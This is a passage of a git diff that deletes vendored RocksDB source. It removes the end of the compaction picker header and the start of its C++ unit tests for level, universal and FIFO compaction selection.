-  // Returns true if any one of the specified files are being compacted
-  bool AreFilesInCompaction(const std::vector<FileMetaData*>& files);
-
-  // Takes a list of CompactionInputFiles and returns a (manual) Compaction
-  // object.
-  Compaction* CompactFiles(const CompactionOptions& compact_options,
-                           const std::vector<CompactionInputFiles>& input_files,
-                           int output_level, VersionStorageInfo* vstorage,
-                           const MutableCFOptions& mutable_cf_options,
-                           uint32_t output_path_id);
-
-  // Converts a set of compaction input file numbers into
-  // a list of CompactionInputFiles.
-  Status GetCompactionInputsFromFileNumbers(
-      std::vector<CompactionInputFiles>* input_files,
-      std::unordered_set<uint64_t>* input_set,
-      const VersionStorageInfo* vstorage,
-      const CompactionOptions& compact_options) const;
-
-  // Is there currently a compaction involving level 0 taking place
-  bool IsLevel0CompactionInProgress() const {
-    return !level0_compactions_in_progress_.empty();
-  }
-
-  // Return true if the passed key range overlap with a compaction output
-  // that is currently running.
-  bool RangeOverlapWithCompaction(const Slice& smallest_user_key,
-                                  const Slice& largest_user_key,
-                                  int level) const;
-
-  // Stores the minimal range that covers all entries in inputs in
-  // *smallest, *largest.
-  // REQUIRES: inputs is not empty
-  void GetRange(const CompactionInputFiles& inputs, InternalKey* smallest,
-                InternalKey* largest) const;
-
-  // Stores the minimal range that covers all entries in inputs1 and inputs2
-  // in *smallest, *largest.
-  // REQUIRES: inputs is not empty
-  void GetRange(const CompactionInputFiles& inputs1,
-                const CompactionInputFiles& inputs2, InternalKey* smallest,
-                InternalKey* largest) const;
-
-  // Stores the minimal range that covers all entries in inputs
-  // in *smallest, *largest.
-  // REQUIRES: inputs is not empty (at least on entry have one file)
-  void GetRange(const std::vector<CompactionInputFiles>& inputs,
-                InternalKey* smallest, InternalKey* largest) const;
-
-  int NumberLevels() const { return ioptions_.num_levels; }
-
-  // Add more files to the inputs on "level" to make sure that
-  // no newer version of a key is compacted to "level+1" while leaving an older
-  // version in a "level". Otherwise, any Get() will search "level" first,
-  // and will likely return an old/stale value for the key, since it always
-  // searches in increasing order of level to find the value. This could
-  // also scramble the order of merge operands. This function should be
-  // called any time a new Compaction is created, and its inputs_[0] are
-  // populated.
-  //
-  // Will return false if it is impossible to apply this compaction.
-  bool ExpandInputsToCleanCut(const std::string& cf_name,
-                              VersionStorageInfo* vstorage,
-                              CompactionInputFiles* inputs);
-
-  // Returns true if any one of the parent files are being compacted
-  bool IsRangeInCompaction(VersionStorageInfo* vstorage,
-                           const InternalKey* smallest,
-                           const InternalKey* largest, int level, int* index);
-
-  // Returns true if the key range that `inputs` files cover overlap with the
-  // key range of a currently running compaction.
-  bool FilesRangeOverlapWithCompaction(
-      const std::vector<CompactionInputFiles>& inputs, int level) const;
-
-  bool SetupOtherInputs(const std::string& cf_name,
-                        const MutableCFOptions& mutable_cf_options,
-                        VersionStorageInfo* vstorage,
-                        CompactionInputFiles* inputs,
-                        CompactionInputFiles* output_level_inputs,
-                        int* parent_index, int base_index);
-
-  void GetGrandparents(VersionStorageInfo* vstorage,
-                       const CompactionInputFiles& inputs,
-                       const CompactionInputFiles& output_level_inputs,
-                       std::vector<FileMetaData*>* grandparents);
-
-  // Register this compaction in the set of running compactions
-  void RegisterCompaction(Compaction* c);
-
-  // Remove this compaction from the set of running compactions
-  void UnregisterCompaction(Compaction* c);
-
-  std::set<Compaction*>* level0_compactions_in_progress() {
-    return &level0_compactions_in_progress_;
-  }
-  std::unordered_set<Compaction*>* compactions_in_progress() {
-    return &compactions_in_progress_;
-  }
-
- protected:
-  const ImmutableCFOptions& ioptions_;
-
-// A helper function to SanitizeCompactionInputFiles() that
-// sanitizes "input_files" by adding necessary files.
-#ifndef ROCKSDB_LITE
-  virtual Status SanitizeCompactionInputFilesForAllLevels(
-      std::unordered_set<uint64_t>* input_files,
-      const ColumnFamilyMetaData& cf_meta, const int output_level) const;
-#endif  // ROCKSDB_LITE
-
-  // Keeps track of all compactions that are running on Level0.
-  // Protected by DB mutex
-  std::set<Compaction*> level0_compactions_in_progress_;
-
-  // Keeps track of all compactions that are running.
-  // Protected by DB mutex
-  std::unordered_set<Compaction*> compactions_in_progress_;
-
-  const InternalKeyComparator* const icmp_;
-};
-
-class LevelCompactionPicker : public CompactionPicker {
- public:
-  LevelCompactionPicker(const ImmutableCFOptions& ioptions,
-                        const InternalKeyComparator* icmp)
-      : CompactionPicker(ioptions, icmp) {}
-  virtual Compaction* PickCompaction(const std::string& cf_name,
-                                     const MutableCFOptions& mutable_cf_options,
-                                     VersionStorageInfo* vstorage,
-                                     LogBuffer* log_buffer) override;
-
-  virtual bool NeedsCompaction(
-      const VersionStorageInfo* vstorage) const override;
-};
-
-#ifndef ROCKSDB_LITE
-class FIFOCompactionPicker : public CompactionPicker {
- public:
-  FIFOCompactionPicker(const ImmutableCFOptions& ioptions,
-                       const InternalKeyComparator* icmp)
-      : CompactionPicker(ioptions, icmp) {}
-
-  virtual Compaction* PickCompaction(const std::string& cf_name,
-                                     const MutableCFOptions& mutable_cf_options,
-                                     VersionStorageInfo* version,
-                                     LogBuffer* log_buffer) override;
-
-  virtual Compaction* CompactRange(
-      const std::string& cf_name, const MutableCFOptions& mutable_cf_options,
-      VersionStorageInfo* vstorage, int input_level, int output_level,
-      uint32_t output_path_id, const InternalKey* begin, const InternalKey* end,
-      InternalKey** compaction_end, bool* manual_conflict) override;
-
-  // The maximum allowed output level.  Always returns 0.
-  virtual int MaxOutputLevel() const override { return 0; }
-
-  virtual bool NeedsCompaction(
-      const VersionStorageInfo* vstorage) const override;
-
- private:
-  Compaction* PickTTLCompaction(const std::string& cf_name,
-                                const MutableCFOptions& mutable_cf_options,
-                                VersionStorageInfo* version,
-                                LogBuffer* log_buffer);
-
-  Compaction* PickSizeCompaction(const std::string& cf_name,
-                                 const MutableCFOptions& mutable_cf_options,
-                                 VersionStorageInfo* version,
-                                 LogBuffer* log_buffer);
-};
-
-class NullCompactionPicker : public CompactionPicker {
- public:
-  NullCompactionPicker(const ImmutableCFOptions& ioptions,
-                       const InternalKeyComparator* icmp)
-      : CompactionPicker(ioptions, icmp) {}
-  virtual ~NullCompactionPicker() {}
-
-  // Always return "nullptr"
-  Compaction* PickCompaction(const std::string& cf_name,
-                             const MutableCFOptions& mutable_cf_options,
-                             VersionStorageInfo* vstorage,
-                             LogBuffer* log_buffer) override {
-    return nullptr;
-  }
-
-  // Always return "nullptr"
-  Compaction* CompactRange(const std::string& cf_name,
-                           const MutableCFOptions& mutable_cf_options,
-                           VersionStorageInfo* vstorage, int input_level,
-                           int output_level, uint32_t output_path_id,
-                           const InternalKey* begin, const InternalKey* end,
-                           InternalKey** compaction_end,
-                           bool* manual_conflict) override {
-    return nullptr;
-  }
-
-  // Always returns false.
-  virtual bool NeedsCompaction(
-      const VersionStorageInfo* vstorage) const override {
-    return false;
-  }
-};
-#endif  // !ROCKSDB_LITE
-
-CompressionType GetCompressionType(const ImmutableCFOptions& ioptions,
-                                   const VersionStorageInfo* vstorage,
-                                   const MutableCFOptions& mutable_cf_options,
-                                   int level, int base_level,
-                                   const bool enable_compression = true);
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/compaction_picker_test.cc b/thirdparty/rocksdb/db/compaction_picker_test.cc
deleted file mode 100644
index bba2d07..0000000
--- a/thirdparty/rocksdb/db/compaction_picker_test.cc
+++ /dev/null
@@ -1,1441 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "db/compaction_picker.h"
-#include <limits>
-#include <string>
-#include <utility>
-#include "db/compaction.h"
-#include "db/compaction_picker_universal.h"
-
-#include "util/logging.h"
-#include "util/string_util.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-
-namespace rocksdb {
-
-class CountingLogger : public Logger {
- public:
-  using Logger::Logv;
-  virtual void Logv(const char* format, va_list ap) override { log_count++; }
-  size_t log_count;
-};
-
-class CompactionPickerTest : public testing::Test {
- public:
-  const Comparator* ucmp_;
-  InternalKeyComparator icmp_;
-  Options options_;
-  ImmutableCFOptions ioptions_;
-  MutableCFOptions mutable_cf_options_;
-  LevelCompactionPicker level_compaction_picker;
-  std::string cf_name_;
-  CountingLogger logger_;
-  LogBuffer log_buffer_;
-  uint32_t file_num_;
-  CompactionOptionsFIFO fifo_options_;
-  std::unique_ptr<VersionStorageInfo> vstorage_;
-  std::vector<std::unique_ptr<FileMetaData>> files_;
-  // does not own FileMetaData
-  std::unordered_map<uint32_t, std::pair<FileMetaData*, int>> file_map_;
-  // input files to compaction process.
-  std::vector<CompactionInputFiles> input_files_;
-  int compaction_level_start_;
-
-  CompactionPickerTest()
-      : ucmp_(BytewiseComparator()),
-        icmp_(ucmp_),
-        ioptions_(options_),
-        mutable_cf_options_(options_),
-        level_compaction_picker(ioptions_, &icmp_),
-        cf_name_("dummy"),
-        log_buffer_(InfoLogLevel::INFO_LEVEL, &logger_),
-        file_num_(1),
-        vstorage_(nullptr) {
-    fifo_options_.max_table_files_size = 1;
-    mutable_cf_options_.RefreshDerivedOptions(ioptions_);
-    ioptions_.db_paths.emplace_back("dummy",
-                                    std::numeric_limits<uint64_t>::max());
-  }
-
-  ~CompactionPickerTest() {
-  }
-
-  void NewVersionStorage(int num_levels, CompactionStyle style) {
-    DeleteVersionStorage();
-    options_.num_levels = num_levels;
-    vstorage_.reset(new VersionStorageInfo(&icmp_, ucmp_, options_.num_levels,
-                                           style, nullptr, false));
-    vstorage_->CalculateBaseBytes(ioptions_, mutable_cf_options_);
-  }
-
-  void DeleteVersionStorage() {
-    vstorage_.reset();
-    files_.clear();
-    file_map_.clear();
-    input_files_.clear();
-  }
-
-  void Add(int level, uint32_t file_number, const char* smallest,
-           const char* largest, uint64_t file_size = 1, uint32_t path_id = 0,
-           SequenceNumber smallest_seq = 100,
-           SequenceNumber largest_seq = 100) {
-    assert(level < vstorage_->num_levels());
-    FileMetaData* f = new FileMetaData;
-    f->fd = FileDescriptor(file_number, path_id, file_size);
-    f->smallest = InternalKey(smallest, smallest_seq, kTypeValue);
-    f->largest = InternalKey(largest, largest_seq, kTypeValue);
-    f->smallest_seqno = smallest_seq;
-    f->largest_seqno = largest_seq;
-    f->compensated_file_size = file_size;
-    f->refs = 0;
-    vstorage_->AddFile(level, f);
-    files_.emplace_back(f);
-    file_map_.insert({file_number, {f, level}});
-  }
-
-  void SetCompactionInputFilesLevels(int level_count, int start_level) {
-    input_files_.resize(level_count);
-    for (int i = 0; i < level_count; ++i) {
-      input_files_[i].level = start_level + i;
-    }
-    compaction_level_start_ = start_level;
-  }
-
-  void AddToCompactionFiles(uint32_t file_number) {
-    auto iter = file_map_.find(file_number);
-    assert(iter != file_map_.end());
-    int level = iter->second.second;
-    assert(level < vstorage_->num_levels());
-    input_files_[level - compaction_level_start_].files.emplace_back(
-        iter->second.first);
-  }
-
-  void UpdateVersionStorageInfo() {
-    vstorage_->CalculateBaseBytes(ioptions_, mutable_cf_options_);
-    vstorage_->UpdateFilesByCompactionPri(ioptions_.compaction_pri);
-    vstorage_->UpdateNumNonEmptyLevels();
-    vstorage_->GenerateFileIndexer();
-    vstorage_->GenerateLevelFilesBrief();
-    vstorage_->ComputeCompactionScore(ioptions_, mutable_cf_options_);
-    vstorage_->GenerateLevel0NonOverlapping();
-    vstorage_->ComputeFilesMarkedForCompaction();
-    vstorage_->SetFinalized();
-  }
-};
-
-TEST_F(CompactionPickerTest, Empty) {
-  NewVersionStorage(6, kCompactionStyleLevel);
-  UpdateVersionStorageInfo();
-  std::unique_ptr<Compaction> compaction(level_compaction_picker.PickCompaction(
-      cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_));
-  ASSERT_TRUE(compaction.get() == nullptr);
-}
-
-TEST_F(CompactionPickerTest, Single) {
-  NewVersionStorage(6, kCompactionStyleLevel);
-  mutable_cf_options_.level0_file_num_compaction_trigger = 2;
-  Add(0, 1U, "p", "q");
-  UpdateVersionStorageInfo();
-
-  std::unique_ptr<Compaction> compaction(level_compaction_picker.PickCompaction(
-      cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_));
-  ASSERT_TRUE(compaction.get() == nullptr);
-}
-
-TEST_F(CompactionPickerTest, Level0Trigger) {
-  NewVersionStorage(6, kCompactionStyleLevel);
-  mutable_cf_options_.level0_file_num_compaction_trigger = 2;
-  Add(0, 1U, "150", "200");
-  Add(0, 2U, "200", "250");
-
-  UpdateVersionStorageInfo();
-
-  std::unique_ptr<Compaction> compaction(level_compaction_picker.PickCompaction(
-      cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_));
-  ASSERT_TRUE(compaction.get() != nullptr);
-  ASSERT_EQ(2U, compaction->num_input_files(0));
-  ASSERT_EQ(1U, compaction->input(0, 0)->fd.GetNumber());
-  ASSERT_EQ(2U, compaction->input(0, 1)->fd.GetNumber());
-}
-
-TEST_F(CompactionPickerTest, Level1Trigger) {
-  NewVersionStorage(6, kCompactionStyleLevel);
-  Add(1, 66U, "150", "200", 1000000000U);
-  UpdateVersionStorageInfo();
-
-  std::unique_ptr<Compaction> compaction(level_compaction_picker.PickCompaction(
-      cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_));
-  ASSERT_TRUE(compaction.get() != nullptr);
-  ASSERT_EQ(1U, compaction->num_input_files(0));
-  ASSERT_EQ(66U, compaction->input(0, 0)->fd.GetNumber());
-}
-
-TEST_F(CompactionPickerTest, Level1Trigger2) {
-  NewVersionStorage(6, kCompactionStyleLevel);
-  Add(1, 66U, "150", "200", 1000000001U);
-  Add(1, 88U, "201", "300", 1000000000U);
-  Add(2, 6U, "150", "179", 1000000000U);
-  Add(2, 7U, "180", "220", 1000000000U);
-  Add(2, 8U, "221", "300", 1000000000U);
-  UpdateVersionStorageInfo();
-
-  std::unique_ptr<Compaction> compaction(level_compaction_picker.PickCompaction(
-      cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_));
-  ASSERT_TRUE(compaction.get() != nullptr);
-  ASSERT_EQ(1U, compaction->num_input_files(0));
-  ASSERT_EQ(2U, compaction->num_input_files(1));
-  ASSERT_EQ(66U, compaction->input(0, 0)->fd.GetNumber());
-  ASSERT_EQ(6U, compaction->input(1, 0)->fd.GetNumber());
-  ASSERT_EQ(7U, compaction->input(1, 1)->fd.GetNumber());
-}
-
-TEST_F(CompactionPickerTest, LevelMaxScore) {
-  NewVersionStorage(6, kCompactionStyleLevel);
-  mutable_cf_options_.target_file_size_base = 10000000;
-  mutable_cf_options_.target_file_size_multiplier = 10;
-  mutable_cf_options_.max_bytes_for_level_base = 10 * 1024 * 1024;
-  Add(0, 1U, "150", "200", 1000000U);
-  // Level 1 score 1.2
-  Add(1, 66U, "150", "200", 6000000U);
-  Add(1, 88U, "201", "300", 6000000U);
-  // Level 2 score 1.8. File 7 is the largest. Should be picked
-  Add(2, 6U, "150", "179", 60000000U);
-  Add(2, 7U, "180", "220", 60000001U);
-  Add(2, 8U, "221", "300", 60000000U);
-  // Level 3 score slightly larger than 1
-  Add(3, 26U, "150", "170", 260000000U);
-  Add(3, 27U, "171", "179", 260000000U);
-  Add(3, 28U, "191", "220", 260000000U);
-  Add(3, 29U, "221", "300", 260000000U);
-  UpdateVersionStorageInfo();
-
-  std::unique_ptr<Compaction> compaction(level_compaction_picker.PickCompaction(
-      cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_));
-  ASSERT_TRUE(compaction.get() != nullptr);
-  ASSERT_EQ(1U, compaction->num_input_files(0));
-  ASSERT_EQ(7U, compaction->input(0, 0)->fd.GetNumber());
-}
-
-TEST_F(CompactionPickerTest, NeedsCompactionLevel) {
-  const int kLevels = 6;
-  const int kFileCount = 20;
-
-  for (int level = 0; level < kLevels - 1; ++level) {
-    NewVersionStorage(kLevels, kCompactionStyleLevel);
-    uint64_t file_size = vstorage_->MaxBytesForLevel(level) * 2 / kFileCount;
-    for (int file_count = 1; file_count <= kFileCount; ++file_count) {
-      // start a brand new version in each test.
-      NewVersionStorage(kLevels, kCompactionStyleLevel);
-      for (int i = 0; i < file_count; ++i) {
-        Add(level, i, ToString((i + 100) * 1000).c_str(),
-            ToString((i + 100) * 1000 + 999).c_str(),
-            file_size, 0, i * 100, i * 100 + 99);
-      }
-      UpdateVersionStorageInfo();
-      ASSERT_EQ(vstorage_->CompactionScoreLevel(0), level);
-      ASSERT_EQ(level_compaction_picker.NeedsCompaction(vstorage_.get()),
-                vstorage_->CompactionScore(0) >= 1);
-      // release the version storage
-      DeleteVersionStorage();
-    }
-  }
-}
-
-TEST_F(CompactionPickerTest, Level0TriggerDynamic) {
-  int num_levels = ioptions_.num_levels;
-  ioptions_.level_compaction_dynamic_level_bytes = true;
-  mutable_cf_options_.level0_file_num_compaction_trigger = 2;
-  mutable_cf_options_.max_bytes_for_level_base = 200;
-  mutable_cf_options_.max_bytes_for_level_multiplier = 10;
-  NewVersionStorage(num_levels, kCompactionStyleLevel);
-  Add(0, 1U, "150", "200");
-  Add(0, 2U, "200", "250");
-
-  UpdateVersionStorageInfo();
-
-  std::unique_ptr<Compaction> compaction(level_compaction_picker.PickCompaction(
-      cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_));
-  ASSERT_TRUE(compaction.get() != nullptr);
-  ASSERT_EQ(2U, compaction->num_input_files(0));
-  ASSERT_EQ(1U, compaction->input(0, 0)->fd.GetNumber());
-  ASSERT_EQ(2U, compaction->input(0, 1)->fd.GetNumber());
-  ASSERT_EQ(1, static_cast<int>(compaction->num_input_levels()));
-  ASSERT_EQ(num_levels - 1, compaction->output_level());
-}
-
-TEST_F(CompactionPickerTest, Level0TriggerDynamic2) {
-  int num_levels = ioptions_.num_levels;
-  ioptions_.level_compaction_dynamic_level_bytes = true;
-  mutable_cf_options_.level0_file_num_compaction_trigger = 2;
-  mutable_cf_options_.max_bytes_for_level_base = 200;
-  mutable_cf_options_.max_bytes_for_level_multiplier = 10;
-  NewVersionStorage(num_levels, kCompactionStyleLevel);
-  Add(0, 1U, "150", "200");
-  Add(0, 2U, "200", "250");
-  Add(num_levels - 1, 3U, "200", "250", 300U);
-
-  UpdateVersionStorageInfo();
-  ASSERT_EQ(vstorage_->base_level(), num_levels - 2);
-
-  std::unique_ptr<Compaction> compaction(level_compaction_picker.PickCompaction(
-      cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_));
-  ASSERT_TRUE(compaction.get() != nullptr);
-  ASSERT_EQ(2U, compaction->num_input_files(0));
-  ASSERT_EQ(1U, compaction->input(0, 0)->fd.GetNumber());
-  ASSERT_EQ(2U, compaction->input(0, 1)->fd.GetNumber());
-  ASSERT_EQ(1, static_cast<int>(compaction->num_input_levels()));
-  ASSERT_EQ(num_levels - 2, compaction->output_level());
-}
-
-TEST_F(CompactionPickerTest, Level0TriggerDynamic3) {
-  int num_levels = ioptions_.num_levels;
-  ioptions_.level_compaction_dynamic_level_bytes = true;
-  mutable_cf_options_.level0_file_num_compaction_trigger = 2;
-  mutable_cf_options_.max_bytes_for_level_base = 200;
-  mutable_cf_options_.max_bytes_for_level_multiplier = 10;
-  NewVersionStorage(num_levels, kCompactionStyleLevel);
-  Add(0, 1U, "150", "200");
-  Add(0, 2U, "200", "250");
-  Add(num_levels - 1, 3U, "200", "250", 300U);
-  Add(num_levels - 1, 4U, "300", "350", 3000U);
-
-  UpdateVersionStorageInfo();
-  ASSERT_EQ(vstorage_->base_level(), num_levels - 3);
-
-  std::unique_ptr<Compaction> compaction(level_compaction_picker.PickCompaction(
-      cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_));
-  ASSERT_TRUE(compaction.get() != nullptr);
-  ASSERT_EQ(2U, compaction->num_input_files(0));
-  ASSERT_EQ(1U, compaction->input(0, 0)->fd.GetNumber());
-  ASSERT_EQ(2U, compaction->input(0, 1)->fd.GetNumber());
-  ASSERT_EQ(1, static_cast<int>(compaction->num_input_levels()));
-  ASSERT_EQ(num_levels - 3, compaction->output_level());
-}
-
-TEST_F(CompactionPickerTest, Level0TriggerDynamic4) {
-  int num_levels = ioptions_.num_levels;
-  ioptions_.level_compaction_dynamic_level_bytes = true;
-  mutable_cf_options_.level0_file_num_compaction_trigger = 2;
-  mutable_cf_options_.max_bytes_for_level_base = 200;
-  mutable_cf_options_.max_bytes_for_level_multiplier = 10;
-
-  NewVersionStorage(num_levels, kCompactionStyleLevel);
-  Add(0, 1U, "150", "200");
-  Add(0, 2U, "200", "250");
-  Add(num_levels - 1, 3U, "200", "250", 300U);
-  Add(num_levels - 1, 4U, "300", "350", 3000U);
-  Add(num_levels - 3, 5U, "150", "180", 3U);
-  Add(num_levels - 3, 6U, "181", "300", 3U);
-  Add(num_levels - 3, 7U, "400", "450", 3U);
-
-  UpdateVersionStorageInfo();
-  ASSERT_EQ(vstorage_->base_level(), num_levels - 3);
-
-  std::unique_ptr<Compaction> compaction(level_compaction_picker.PickCompaction(
-      cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_));
-  ASSERT_TRUE(compaction.get() != nullptr);
-  ASSERT_EQ(2U, compaction->num_input_files(0));
-  ASSERT_EQ(1U, compaction->input(0, 0)->fd.GetNumber());
-  ASSERT_EQ(2U, compaction->input(0, 1)->fd.GetNumber());
-  ASSERT_EQ(2U, compaction->num_input_files(1));
-  ASSERT_EQ(num_levels - 3, compaction->level(1));
-  ASSERT_EQ(5U, compaction->input(1, 0)->fd.GetNumber());
-  ASSERT_EQ(6U, compaction->input(1, 1)->fd.GetNumber());
-  ASSERT_EQ(2, static_cast<int>(compaction->num_input_levels()));
-  ASSERT_EQ(num_levels - 3, compaction->output_level());
-}
-
-TEST_F(CompactionPickerTest, LevelTriggerDynamic4) {
-  int num_levels = ioptions_.num_levels;
-  ioptions_.level_compaction_dynamic_level_bytes = true;
-  ioptions_.compaction_pri = kMinOverlappingRatio;
-  mutable_cf_options_.level0_file_num_compaction_trigger = 2;
-  mutable_cf_options_.max_bytes_for_level_base = 200;
-  mutable_cf_options_.max_bytes_for_level_multiplier = 10;
-  NewVersionStorage(num_levels, kCompactionStyleLevel);
-  Add(0, 1U, "150", "200");
-  Add(num_levels - 1, 3U, "200", "250", 300U);
-  Add(num_levels - 1, 4U, "300", "350", 3000U);
-  Add(num_levels - 1, 4U, "400", "450", 3U);
-  Add(num_levels - 2, 5U, "150", "180", 300U);
-  Add(num_levels - 2, 6U, "181", "350", 500U);
-  Add(num_levels - 2, 7U, "400", "450", 200U);
-
-  UpdateVersionStorageInfo();
-
-  std::unique_ptr<Compaction> compaction(level_compaction_picker.PickCompaction(
-      cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_));
-  ASSERT_TRUE(compaction.get() != nullptr);
-  ASSERT_EQ(1U, compaction->num_input_files(0));
-  ASSERT_EQ(5U, compaction->input(0, 0)->fd.GetNumber());
-  ASSERT_EQ(0, compaction->num_input_files(1));
-  ASSERT_EQ(1U, compaction->num_input_levels());
-  ASSERT_EQ(num_levels - 1, compaction->output_level());
-}
-
-// Universal and FIFO Compactions are not supported in ROCKSDB_LITE
-#ifndef ROCKSDB_LITE
-TEST_F(CompactionPickerTest, NeedsCompactionUniversal) {
-  NewVersionStorage(1, kCompactionStyleUniversal);
-  UniversalCompactionPicker universal_compaction_picker(
-      ioptions_, &icmp_);
-  // must return false when there's no files.
-  ASSERT_EQ(universal_compaction_picker.NeedsCompaction(vstorage_.get()),
-            false);
-  UpdateVersionStorageInfo();
-
-  // verify the trigger given different number of L0 files.
-  for (int i = 1;
-       i <= mutable_cf_options_.level0_file_num_compaction_trigger * 2; ++i) {
-    NewVersionStorage(1, kCompactionStyleUniversal);
-    Add(0, i, ToString((i + 100) * 1000).c_str(),
-        ToString((i + 100) * 1000 + 999).c_str(), 1000000, 0, i * 100,
-        i * 100 + 99);
-    UpdateVersionStorageInfo();
-    ASSERT_EQ(level_compaction_picker.NeedsCompaction(vstorage_.get()),
-              vstorage_->CompactionScore(0) >= 1);
-  }
-}
-
-TEST_F(CompactionPickerTest, CompactionUniversalIngestBehindReservedLevel) {
-  const uint64_t kFileSize = 100000;
-  NewVersionStorage(1, kCompactionStyleUniversal);
-  ioptions_.allow_ingest_behind = true;
-  ioptions_.num_levels = 3;
-  UniversalCompactionPicker universal_compaction_picker(ioptions_, &icmp_);
-  // must return false when there's no files.
-  ASSERT_EQ(universal_compaction_picker.NeedsCompaction(vstorage_.get()),
-            false);
-
-  NewVersionStorage(3, kCompactionStyleUniversal);
-
-  Add(0, 1U, "150", "200", kFileSize, 0, 500, 550);
-  Add(0, 2U, "201", "250", kFileSize, 0, 401, 450);
-  Add(0, 4U, "260", "300", kFileSize, 0, 260, 300);
-  Add(1, 5U, "100", "151", kFileSize, 0, 200, 251);
-  Add(1, 3U, "301", "350", kFileSize, 0, 101, 150);
-  Add(2, 6U, "120", "200", kFileSize, 0, 20, 100);
-
-  UpdateVersionStorageInfo();
-
-  std::unique_ptr<Compaction> compaction(
-      universal_compaction_picker.PickCompaction(
-          cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_));
-
-  // output level should be the one above the bottom-most
-  ASSERT_EQ(1, compaction->output_level());
-}
-// Tests if the files can be trivially moved in multi level
-// universal compaction when allow_trivial_move option is set
-// In this test as the input files overlaps, they cannot
-// be trivially moved.
-
-TEST_F(CompactionPickerTest, CannotTrivialMoveUniversal) {
-  const uint64_t kFileSize = 100000;
-
-  ioptions_.compaction_options_universal.allow_trivial_move = true;
-  NewVersionStorage(1, kCompactionStyleUniversal);
-  UniversalCompactionPicker universal_compaction_picker(ioptions_, &icmp_);
-  // must return false when there's no files.
-  ASSERT_EQ(universal_compaction_picker.NeedsCompaction(vstorage_.get()),
-            false);
-
-  NewVersionStorage(3, kCompactionStyleUniversal);
-
-  Add(0, 1U, "150", "200", kFileSize, 0, 500, 550);
-  Add(0, 2U, "201", "250", kFileSize, 0, 401, 450);
-  Add(0, 4U, "260", "300", kFileSize, 0, 260, 300);
-  Add(1, 5U, "100", "151", kFileSize, 0, 200, 251);
-  Add(1, 3U, "301", "350", kFileSize, 0, 101, 150);
-  Add(2, 6U, "120", "200", kFileSize, 0, 20, 100);
-
-  UpdateVersionStorageInfo();
-
-  std::unique_ptr<Compaction> compaction(
-      universal_compaction_picker.PickCompaction(
-          cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_));
-
-  ASSERT_TRUE(!compaction->is_trivial_move());
-}
-// Tests if the files can be trivially moved in multi level
-// universal compaction when allow_trivial_move option is set
-// In this test as the input files doesn't overlaps, they should
-// be trivially moved.
-TEST_F(CompactionPickerTest, AllowsTrivialMoveUniversal) {
-  const uint64_t kFileSize = 100000;
-
-  ioptions_.compaction_options_universal.allow_trivial_move = true;
-  UniversalCompactionPicker universal_compaction_picker(ioptions_, &icmp_);
-
-  NewVersionStorage(3, kCompactionStyleUniversal);
-
-  Add(0, 1U, "150", "200", kFileSize, 0, 500, 550);
-  Add(0, 2U, "201", "250", kFileSize, 0, 401, 450);
-  Add(0, 4U, "260", "300", kFileSize, 0, 260, 300);
-  Add(1, 5U, "010", "080", kFileSize, 0, 200, 251);
-  Add(2, 3U, "301", "350", kFileSize, 0, 101, 150);
-
-  UpdateVersionStorageInfo();
-
-  std::unique_ptr<Compaction> compaction(
-      universal_compaction_picker.PickCompaction(
-          cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_));
-
-  ASSERT_TRUE(compaction->is_trivial_move());
-}
-
-TEST_F(CompactionPickerTest, NeedsCompactionFIFO) {
-  NewVersionStorage(1, kCompactionStyleFIFO);
-  const int kFileCount =
-      mutable_cf_options_.level0_file_num_compaction_trigger * 3;
-  const uint64_t kFileSize = 100000;
-  const uint64_t kMaxSize = kFileSize * kFileCount / 2;
-
-  fifo_options_.max_table_files_size = kMaxSize;
-  ioptions_.compaction_options_fifo = fifo_options_;
-  FIFOCompactionPicker fifo_compaction_picker(ioptions_, &icmp_);
-  UpdateVersionStorageInfo();
-  // must return false when there's no files.
-  ASSERT_EQ(fifo_compaction_picker.NeedsCompaction(vstorage_.get()), false);
-
-  // verify whether compaction is needed based on the current
-  // size of L0 files.
-  uint64_t current_size = 0;
-  for (int i = 1; i <= kFileCount; ++i) {
-    NewVersionStorage(1, kCompactionStyleFIFO);
-    Add(0, i, ToString((i + 100) * 1000).c_str(),
-        ToString((i + 100) * 1000 + 999).c_str(),
-        kFileSize, 0, i * 100, i * 100 + 99);
-    current_size += kFileSize;
-    UpdateVersionStorageInfo();
-    ASSERT_EQ(fifo_compaction_picker.NeedsCompaction(vstorage_.get()),
-              vstorage_->CompactionScore(0) >= 1);
-  }
-}
-#endif  // ROCKSDB_LITE
-
-TEST_F(CompactionPickerTest, CompactionPriMinOverlapping1) {
-  NewVersionStorage(6, kCompactionStyleLevel);
-  ioptions_.compaction_pri = kMinOverlappingRatio;
-  mutable_cf_options_.target_file_size_base = 10000000;
-  mutable_cf_options_.target_file_size_multiplier = 10;
-  mutable_cf_options_.max_bytes_for_level_base = 10 * 1024 * 1024;
-
-  Add(2, 6U, "150", "179", 50000000U);
-  Add(2, 7U, "180", "220", 50000000U);
-  Add(2, 8U, "321", "400", 50000000U);  // File not overlapping
-  Add(2, 9U, "721", "800", 50000000U);
-
-  Add(3, 26U, "150", "170", 260000000U);
-  Add(3, 27U, "171", "179", 260000000U);
-  Add(3, 28U, "191", "220", 260000000U);
-  Add(3, 29U, "221", "300", 260000000U);
-  Add(3, 30U, "750", "900", 260000000U);
-  UpdateVersionStorageInfo();
-
-  std::unique_ptr<Compaction> compaction(level_compaction_picker.PickCompaction(
-      cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_));
-  ASSERT_TRUE(compaction.get() != nullptr);
